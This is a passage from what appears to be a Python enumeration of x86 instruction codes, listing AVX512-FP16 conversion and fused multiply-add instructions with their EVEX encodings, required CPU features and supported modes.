``VCVTQQ2PH xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.MAP5.W1 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4367
"""
``VCVTQQ2PH xmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.MAP5.W1 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSD2SH_XMM_K1Z_XMM_XMMM64_ER: int = 4368
"""
``VCVTSD2SH xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.MAP5.W1 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2SD_XMM_K1Z_XMM_XMMM16_SAE: int = 4369
"""
``VCVTSH2SD xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 5A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2SI_R32_XMMM16_ER: int = 4370
"""
``VCVTSH2SI r32, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W0 2D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2SI_R64_XMMM16_ER: int = 4371
"""
``VCVTSH2SI r64, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W1 2D /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTSH2SS_XMM_K1Z_XMM_XMMM16_SAE: int = 4372
"""
``VCVTSH2SS xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.MAP6.W0 13 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2USI_R32_XMMM16_ER: int = 4373
"""
``VCVTSH2USI r32, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W0 79 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSH2USI_R64_XMMM16_ER: int = 4374
"""
``VCVTSH2USI r64, xmm1/m16{er}``
``EVEX.LIG.F3.MAP5.W1 79 /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTSI2SH_XMM_XMM_RM32_ER: int = 4375
"""
``VCVTSI2SH xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.MAP5.W0 2A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTSI2SH_XMM_XMM_RM64_ER: int = 4376
"""
``VCVTSI2SH xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.MAP5.W1 2A /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTSS2SH_XMM_K1Z_XMM_XMMM32_ER: int = 4377
"""
``VCVTSS2SH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.MAP5.W0 1D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2DQ_XMM_K1Z_XMMM64B16: int = 4378
"""
``VCVTTPH2DQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.F3.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2DQ_YMM_K1Z_XMMM128B16: int = 4379
"""
``VCVTTPH2DQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.F3.MAP5.W0 5B /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2DQ_ZMM_K1Z_YMMM256B16_SAE: int = 4380
"""
``VCVTTPH2DQ zmm1 {k1}{z}, ymm2/m256/m16bcst{sae}``
``EVEX.512.F3.MAP5.W0 5B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2QQ_XMM_K1Z_XMMM32B16: int = 4381
"""
``VCVTTPH2QQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2QQ_YMM_K1Z_XMMM64B16: int = 4382
"""
``VCVTTPH2QQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2QQ_ZMM_K1Z_XMMM128B16_SAE: int = 4383
"""
``VCVTTPH2QQ zmm1 {k1}{z}, xmm2/m128/m16bcst{sae}``
``EVEX.512.66.MAP5.W0 7A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4384
"""
``VCVTTPH2UDQ xmm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.128.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4385
"""
``VCVTTPH2UDQ ymm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.256.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UDQ_ZMM_K1Z_YMMM256B16_SAE: int = 4386
"""
``VCVTTPH2UDQ zmm1 {k1}{z}, ymm2/m256/m16bcst{sae}``
``EVEX.512.MAP5.W0 78 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4387
"""
``VCVTTPH2UQQ xmm1 {k1}{z}, xmm2/m32/m16bcst``
``EVEX.128.66.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4388
"""
``VCVTTPH2UQQ ymm1 {k1}{z}, xmm2/m64/m16bcst``
``EVEX.256.66.MAP5.W0 78 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UQQ_ZMM_K1Z_XMMM128B16_SAE: int = 4389
"""
``VCVTTPH2UQQ zmm1 {k1}{z}, xmm2/m128/m16bcst{sae}``
``EVEX.512.66.MAP5.W0 78 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UW_XMM_K1Z_XMMM128B16: int = 4390
"""
``VCVTTPH2UW xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UW_YMM_K1Z_YMMM256B16: int = 4391
"""
``VCVTTPH2UW ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2UW_ZMM_K1Z_ZMMM512B16_SAE: int = 4392
"""
``VCVTTPH2UW zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}``
``EVEX.512.MAP5.W0 7C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2W_XMM_K1Z_XMMM128B16: int = 4393
"""
``VCVTTPH2W xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2W_YMM_K1Z_YMMM256B16: int = 4394
"""
``VCVTTPH2W ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP5.W0 7C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTPH2W_ZMM_K1Z_ZMMM512B16_SAE: int = 4395
"""
``VCVTTPH2W zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}``
``EVEX.512.66.MAP5.W0 7C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTSH2SI_R32_XMMM16_SAE: int = 4396
"""
``VCVTTSH2SI r32, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 2C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTSH2SI_R64_XMMM16_SAE: int = 4397
"""
``VCVTTSH2SI r64, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W1 2C /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTTSH2USI_R32_XMMM16_SAE: int = 4398
"""
``VCVTTSH2USI r32, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 78 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTTSH2USI_R64_XMMM16_SAE: int = 4399
"""
``VCVTTSH2USI r64, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W1 78 /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTUDQ2PH_XMM_K1Z_XMMM128B32: int = 4400
"""
``VCVTUDQ2PH xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F2.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PH_XMM_K1Z_YMMM256B32: int = 4401
"""
``VCVTUDQ2PH xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F2.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4402
"""
``VCVTUDQ2PH ymm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.F2.MAP5.W0 7A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PH_XMM_K1Z_XMMM128B64: int = 4403
"""
``VCVTUQQ2PH xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F2.MAP5.W1 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PH_XMM_K1Z_YMMM256B64: int = 4404
"""
``VCVTUQQ2PH xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F2.MAP5.W1 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4405
"""
``VCVTUQQ2PH xmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F2.MAP5.W1 7A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SH_XMM_XMM_RM32_ER: int = 4406
"""
``VCVTUSI2SH xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.MAP5.W0 7B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SH_XMM_XMM_RM64_ER: int = 4407
"""
``VCVTUSI2SH xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.MAP5.W1 7B /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTUW2PH_XMM_K1Z_XMMM128B16: int = 4408
"""
``VCVTUW2PH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.F2.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUW2PH_YMM_K1Z_YMMM256B16: int = 4409
"""
``VCVTUW2PH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.F2.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4410
"""
``VCVTUW2PH zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.F2.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTW2PH_XMM_K1Z_XMMM128B16: int = 4411
"""
``VCVTW2PH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.F3.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTW2PH_YMM_K1Z_YMMM256B16: int = 4412
"""
``VCVTW2PH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.F3.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4413
"""
``VCVTW2PH zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.F3.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVPH_XMM_K1Z_XMM_XMMM128B16: int = 4414
"""
``VDIVPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVPH_YMM_K1Z_YMM_YMMM256B16: int = 4415
"""
``VDIVPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4416
"""
``VDIVPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 5E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVSH_XMM_K1Z_XMM_XMMM16_ER: int = 4417
"""
``VDIVSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 5E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4418
"""
``VFCMADDCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4419
"""
``VFCMADDCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4420
"""
``VFCMADDCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F2.MAP6.W0 56 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4421
"""
``VFMADDCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4422
"""
``VFMADDCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4423
"""
``VFMADDCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F3.MAP6.W0 56 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4424
"""
``VFCMADDCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F2.MAP6.W0 57 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4425
"""
``VFMADDCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.MAP6.W0 57 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4426
"""
``VFCMULCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4427
"""
``VFCMULCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4428
"""
``VFCMULCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F2.MAP6.W0 D6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4429
"""
``VFMULCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4430
"""
``VFMULCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4431
"""
``VFMULCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F3.MAP6.W0 D6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4432
"""
``VFCMULCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F2.MAP6.W0 D7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4433
"""
``VFMULCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.MAP6.W0 D7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4434
"""
``VFMADDSUB132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 96 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4435
"""
``VFMADDSUB132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 96 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4436
"""
``VFMADDSUB132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 96 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4437
"""
``VFMADDSUB213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 A6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4438
"""
``VFMADDSUB213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 A6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4439
"""
``VFMADDSUB213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 A6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4440
"""
``VFMADDSUB231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 B6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4441
"""
``VFMADDSUB231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 B6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4442
"""
``VFMADDSUB231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 B6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4443
"""
``VFMSUBADD132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 97 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4444
"""
``VFMSUBADD132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 97 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4445
"""
``VFMSUBADD132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 97 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4446
"""
``VFMSUBADD213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 A7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4447
"""
``VFMSUBADD213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 A7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4448
"""
``VFMSUBADD213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 A7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4449
"""
``VFMSUBADD231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 B7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4450
"""
``VFMSUBADD231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 B7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4451
"""
``VFMSUBADD231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 B7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4452
"""
``VFMADD132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 98 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4453
"""
``VFMADD132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 98 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4454
"""
``VFMADD132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 98 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4455
"""
``VFMADD213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 A8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4456
"""
``VFMADD213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 A8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4457
"""
``VFMADD213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 A8 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4458
"""
``VFMADD231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 B8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4459
"""
``VFMADD231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 B8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4460
"""
``VFMADD231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 B8 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4461
"""
``VFNMADD132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 9C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4462
"""
``VFNMADD132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 9C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4463
"""
``VFNMADD132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 9C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4464
"""
``VFNMADD213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 AC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4465
"""
``VFNMADD213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 AC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4466
"""
``VFNMADD213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 AC /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4467
"""
``VFNMADD231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 BC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4468
"""
``VFNMADD231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 BC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4469
"""
``VFNMADD231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 BC /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4470
"""
``VFMADD132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 99 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4471
"""
``VFMADD213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 A9 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4472
"""
``VFMADD231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 B9 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4473
"""
``VFNMADD132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 9D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4474
"""
